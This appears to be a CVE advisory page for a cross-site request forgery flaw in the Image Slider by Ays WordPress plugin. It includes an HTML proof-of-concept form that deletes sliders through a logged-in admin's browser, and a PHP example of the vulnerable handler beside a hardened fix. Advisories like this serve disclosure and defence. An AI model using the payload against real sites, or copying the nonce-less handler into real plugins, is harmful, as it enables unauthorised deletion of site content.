Security Vulnerability Report
CVE-2025-14454 CVSS 4.3 MEDIUM

CVE-2025-14454

Published: 2025-12-13 16:16:50
Last Modified: 2026-04-15 00:35:42

Description

The Image Slider by Ays- Responsive Slider and Carousel plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.7.0. The bulk delete functionality has missing or incorrect nonce validation, so an unauthenticated attacker can delete arbitrary sliders via a forged request, provided they can trick a logged-in site administrator into performing an action such as clicking a link.

Weakness: CWE-352 (Cross-Site Request Forgery).

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N

Configurations (Affected Products)

Image Slider by Ays (ays-slider) <= 2.7.0 (affected)
Fixed in 2.7.1 (per the referenced changeset 3417916)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
html
<!DOCTYPE html>
<!-- CVE-2025-14454 CSRF PoC for Image Slider by Ays plugin -->
<!-- Demonstrates how an attacker-controlled page can make a logged-in admin's
     browser submit the plugin's bulk-delete action. The field names used here
     (action, slider[], ays-slider-action) are the PoC author's assumptions;
     confirm them against the plugin's list-table handler (see the referenced
     class-ays-slider-list-table.php#L430) before relying on them. -->
<html>
<head>
  <meta charset="utf-8">
  <title>Image Slider CSRF PoC</title>
</head>
<body>
  <h1>CSRF Attack - Delete All Sliders</h1>
  <p>Click the button below to execute the CSRF attack (as admin):</p>
  <!-- Form to delete the slider with ID 1 -->
  <form id="csrfForm" action="http://target-site.com/wp-admin/admin.php?page=ays-slider" method="POST">
    <input type="hidden" name="action" value="bulk_delete">
    <input type="hidden" name="slider[]" value="1">
    <!-- Left empty on purpose: the vulnerable handler never validates it -->
    <input type="hidden" name="_wpnonce" value="">
    <input type="hidden" name="ays-slider-action" value="bulk_delete">
    <button type="submit">Click me</button>
  </form>
  <script>
    // Auto-submit the form when the page loads.
    // In a real attack this would be hidden or combined with social engineering.
    // document.getElementById('csrfForm').submit();
  </script>
</body>
</html>
<!-- Alternative: hidden img tag (GET request version, if the handler accepts GET) -->
<!-- <img src="http://target-site.com/wp-admin/admin.php?page=ays-slider&action=bulk_delete&slider[]=1" width="0" height="0" border="0"> -->
<!-- Notes:
     1. The attacker must trick a WordPress admin into visiting this page
     2. The admin must have an active session on the target site
     3. No nonce validation = the request will be processed
     4. Slider IDs can be enumerated or guessed
     5. For a full attack, use JavaScript to delete multiple sliders in sequence
     6. Caveat: WordPress sets its auth cookies without a SameSite attribute, so
        browsers that default to SameSite=Lax (Chromium) will not attach them to a
        top-level cross-site POST except within the short "Lax+POST" grace window
        after login; exploitability in practice depends on the admin's browser -->
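The handler pattern behind this class of bug, as an added example that is not the Ays Slider plugin's or Wordfence's code: a minimal WP_List_Table subclass with a bulk-delete action in the unvalidated shape the description refers to, beside the hardened shape that verifies the nonce WP_List_Table::display() already emits and checks a capability. The class names, the `bulk_delete` action, the `slider[]` field and the `example_sliders` table are hypothetical.

```php
<?php
// Added example, not the Ays Slider plugin's code. Class names, the 'bulk_delete'
// action, the 'slider' field and the 'example_sliders' table are hypothetical.

// Vulnerable shape: acts on the request without validating the nonce that
// WP_List_Table::display() already puts into the form, and without a capability check.
class Example_Slider_List_Table_Vulnerable extends WP_List_Table {
    public function process_bulk_action() {
        if ( 'bulk_delete' !== $this->current_action() || empty( $_POST['slider'] ) ) {
            return;
        }
        global $wpdb;
        $ids = array_map( 'intval', (array) $_POST['slider'] );
        // Any site the admin visits can POST this form: the request is indistinguishable
        // from one the admin submitted from the plugin's own list page.
        $wpdb->query( "DELETE FROM {$wpdb->prefix}example_sliders WHERE id IN (" . implode( ',', $ids ) . ')' );
    }
}

// Hardened shape.
class Example_Slider_List_Table extends WP_List_Table {
    public function __construct() {
        parent::__construct( array(
            'singular' => 'slider',
            'plural'   => 'sliders', // display() emits wp_nonce_field( 'bulk-sliders' )
            'ajax'     => false,
        ) );
    }

    public function process_bulk_action() {
        if ( 'bulk_delete' !== $this->current_action() ) {
            return;
        }

        // CSRF: require the list-table nonce. check_admin_referer() verifies
        // $_REQUEST['_wpnonce'] against the current user's ID and session token and
        // dies on failure, so a cross-site form with an empty or guessed nonce never
        // reaches the query.
        check_admin_referer( 'bulk-' . $this->_args['plural'] );

        // Authorization: a nonce proves intent, not permission.
        if ( ! current_user_can( 'manage_options' ) ) {
            wp_die( esc_html__( 'You are not allowed to delete sliders.', 'example' ), 403 );
        }

        $ids = array_values( array_filter( array_map( 'absint', (array) ( $_POST['slider'] ?? array() ) ) ) );
        if ( empty( $ids ) ) {
            return;
        }

        global $wpdb;
        $placeholders = implode( ',', array_fill( 0, count( $ids ), '%d' ) );
        $wpdb->query(
            $wpdb->prepare( "DELETE FROM {$wpdb->prefix}example_sliders WHERE id IN ($placeholders)", $ids )
        );
    }
}
```

Against the hardened version, the PoC form above (empty `_wpnonce`) fails check_admin_referer() and the request dies before any query runs; the nonce is bound to the admin's user ID and session and is not readable from another origin, so the attacker's page cannot supply a valid one without a separate leak such as XSS. The capability check is a separate control and should not be dropped on the strength of the nonce: the nonce answers "did this user mean to do this", not "may this user do this".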

References

- https://plugins.trac.wordpress.org/browser/ays-slider/tags/2.7.0/includes/lists/class-ays-slider-list-table.php#L430 (affected handler in tag 2.7.0, line 430)
- https://plugins.trac.wordpress.org/browser/ays-slider/trunk/includes/lists/class-ays-slider-list-table.php#L430 (same file in trunk)
- https://plugins.trac.wordpress.org/changeset/3417916/ays-slider/tags/2.7.1/includes/lists/class-ays-slider-list-table.php?old=3278880&old_path=ays-slider%2Ftags%2F2.7.0%2Fincludes%2Flists%2Fclass-ays-slider-list-table.php (fix changeset, 2.7.0 to 2.7.1 diff)
- https://www.wordfence.com/threat-intel/vulnerabilities/id/e211df80-aab7-43a1-8c11-a472f90ef4c6?source=cve (Wordfence advisory)

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2025-14454",
    "sourceIdentifier": "[email protected]",
    "published": "2025-12-13T16:16:50.163",
    "lastModified": "2026-04-15T00:35:42.020",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "The Image Slider by Ays- Responsive Slider and Carousel plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.7.0. This is due to missing or incorrect nonce validation on the bulk delete functionality. This makes it possible for unauthenticated attackers to delete arbitrary sliders via a forged request granted they can trick a site administrator into performing an action such as clicking on a link."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N",
            "baseScore": 4.3,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "REQUIRED",
            "scope": "UNCHANGED",
            "confidentialityImpact": "NONE",
            "integrityImpact": "LOW",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 1.4
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          { "lang": "en", "value": "CWE-352" }
        ]
      }
    ],
    "references": [
      {
        "url": "https://plugins.trac.wordpress.org/browser/ays-slider/tags/2.7.0/includes/lists/class-ays-slider-list-table.php#L430",
        "source": "[email protected]"
      },
      {
        "url": "https://plugins.trac.wordpress.org/browser/ays-slider/trunk/includes/lists/class-ays-slider-list-table.php#L430",
        "source": "[email protected]"
      },
      {
        "url": "https://plugins.trac.wordpress.org/changeset/3417916/ays-slider/tags/2.7.1/includes/lists/class-ays-slider-list-table.php?old=3278880&old_path=ays-slider%2Ftags%2F2.7.0%2Fincludes%2Flists%2Fclass-ays-slider-list-table.php",
        "source": "[email protected]"
      },
      {
        "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/e211df80-aab7-43a1-8c11-a472f90ef4c6?source=cve",
        "source": "[email protected]"
      }
    ]
  }
}